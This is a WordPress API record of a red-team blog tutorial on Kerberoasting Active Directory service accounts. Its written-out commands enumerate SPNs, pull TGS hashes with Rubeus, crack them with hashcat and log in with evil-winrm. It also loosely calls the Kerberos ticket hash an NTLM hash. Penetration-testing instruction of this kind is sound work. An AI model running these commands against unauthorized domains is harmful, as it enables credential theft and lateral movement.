{"id":44,"date":"2025-03-06T05:38:01","date_gmt":"2025-03-06T05:38:01","guid":{"rendered":"http:\/\/racrx.io\/?p=44"},"modified":"2025-03-15T00:31:16","modified_gmt":"2025-03-15T00:31:16","slug":"kerberoasting-with-rubeus","status":"publish","type":"post","link":"https:\/\/racrx.io\/?p=44","title":{"rendered":"Kerberoasting with Rubeus"},"content":{"rendered":"\n<p>This post walks through a Kerberoasting attack using Rubeus. Please ensure you have appropriate authorization to perform security testing within your environment.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Prerequisites:<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A Windows machine joined to an Active Directory domain.<\/li>\n\n\n\n<li>Rubeus.exe (can be compiled from <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">GitHub<\/a>).<\/li>\n\n\n\n<li>A domain user account (even a low-privileged one) to request service tickets.<\/li>\n\n\n\n<li>Hashcat for offline cracking.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 1: Enumerate Service Principal Names (SPNs)<\/strong><\/h3>\n\n\n\n<p>Use <strong>PowerShell<\/strong> to list user accounts that have one or more SPNs registered.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Get-ADUser -Filter {ServicePrincipalName -ne \"$null\"} -Properties ServicePrincipalName<br><\/code><\/pre>\n\n\n\n<p><strong>PowerView:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Get-NetUser -SPN<br><\/code><\/pre>\n\n\n\n<p>Either command lists the usernames and SPNs linked to domain service accounts.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 2: Request Kerberos Service Tickets<\/strong><\/h3>\n\n\n\n<p>Run Rubeus to request service tickets for every account that has an SPN.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast<br><\/code><\/pre>\n\n\n\n<p>This retrieves TGS tickets for accounts with SPNs and displays their hashes.<\/p>\n\n\n\n<p>You can also request tickets for specific users:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast \/user:svc-account<br><\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 3: Extract and Save Hashes<\/strong><\/h3>\n\n\n\n<p>Rubeus will output a hash similar to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>$krb5tgs$23$*svc-account$DOMAIN$HTTP\/service.domain.com*$e52cac67419a9a22$...<br><\/code><\/pre>\n\n\n\n<p>Save the hash to a file (hashes.txt) for offline cracking, or have Rubeus write it there directly:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast \/outfile:hashes.txt<br><\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 4: Crack the Hash Offline (Using Hashcat)<\/strong><\/h3>\n\n\n\n<p>Use Hashcat to brute-force the NTLM hash.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>hashcat -m 13100 hashes.txt \/path\/to\/wordlist.txt --force<br><\/code><\/pre>\n\n\n\n<p>If the service account has a weak password, Hashcat will recover it.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 5: Use the Cracked Password<\/strong><\/h3>\n\n\n\n<p>Once the password is cracked, authenticate using Evil-WinRM, RDP, or other tools:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>evil-winrm -i &lt;target-IP&gt; -u svc-account -p &lt;cracked-password&gt;<br><\/code><\/pre>\n\n\n\n<p>If the compromised account has privileged access, this can lead to privilege escalation.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post walks through a Kerberoasting attack using Rubeus. Please ensure you have appropriate authorization to perform security testing within your environment. Prerequisites: Step 1: Enumerate&hellip; <a href=\"https:\/\/racrx.io\/?p=44\" class=\"apace-readmore-link\"><span class=\"screen-reader-text\">Kerberoasting with Rubeus<\/span>Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-pentesting","category-red-team"],"_links":{"self":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=44"}],"version-history":[{"count":5,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44\/revisions"}],"predecessor-version":[{"id":124,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44\/revisions\/124"}],"wp:attachment":[{"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}